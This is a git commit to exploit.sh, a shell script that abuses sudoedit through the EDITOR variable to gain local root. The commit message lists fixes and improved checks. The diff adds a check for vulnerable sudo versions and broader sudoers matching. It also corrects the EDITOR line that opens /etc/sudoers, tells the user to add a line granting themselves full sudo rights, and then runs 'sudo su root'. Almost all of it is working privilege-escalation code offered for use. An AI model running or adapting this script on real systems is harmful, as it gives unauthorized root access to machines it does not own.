Fixing bugs and improving checks

+ Improved tests on sudoers config file: **the original script have some pitfalls that wouldnt allow to run the script even if the config is vulnerable**, for example when sudoedit is configured with (ALL) or (ALL : ALL) instead of (root), which are still vulnerable configurations. In the last case, it will also break the original script because of the way the last grep was implemented, its also fixed on this version. + Added **test to check** if sudo **version** is vulnerable. + **Fixed bug** *"EDITOR: command not found" when trying to open the editor and typo in `etc/sudoers` filename.
2023-02-02 14:38:51 +01:00
parent 0e1fda22d3
commit e6fca2453f
1 changed files with 12 additions and 3 deletions
--- a/exploit.sh
+++ b/exploit.sh
@@ -18,15 +18,24 @@
 # attacker to add a line to gain privileges on all the files and get a root 
 # shell.

-EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E "(root)" | cut -d ' ' -f 6-)
+if ! sudo --version | head -1 | grep -qE '(1\.8.*|1\.9\.[0-9]1?(p[1-3])?|1\.9\.12p1)$'
+then
+    echo "> Currently installed sudo version is not vulnerable"
+    exit 1
+fi
+
+EXPLOITABLE=$(sudo -l | grep -E "sudoedit|sudo -e" | grep -E '\(root\)|\(ALL\)|\(ALL : ALL\)' | cut -d ')' -f 2-)

 if [ -z "$EXPLOITABLE" ]; then
-    echo "> This user can't run sudoedit as root"
+    echo "> It doesn't seem that this user can run sudoedit as root"
+    read -p "Do you want to proceed anyway? (y/N): " confirm && [[ $confirm == [yY] ]] || exit 2
 else
    echo "> BINGO! User exploitable"
    echo "> Opening sudoers file, please add the following line to the file in order to do the privesc:"
    echo "$USER ALL=(ALL:ALL) ALL"
    read -n 1 -s -r -p "Press any key to continue..."
-    EDITOR = "vim -- /etc/suoders" $EXPLOITABLE
+    EDITOR="vim -- /etc/sudoers" $EXPLOITABLE
    sudo su root
+    exit 0
 fi
+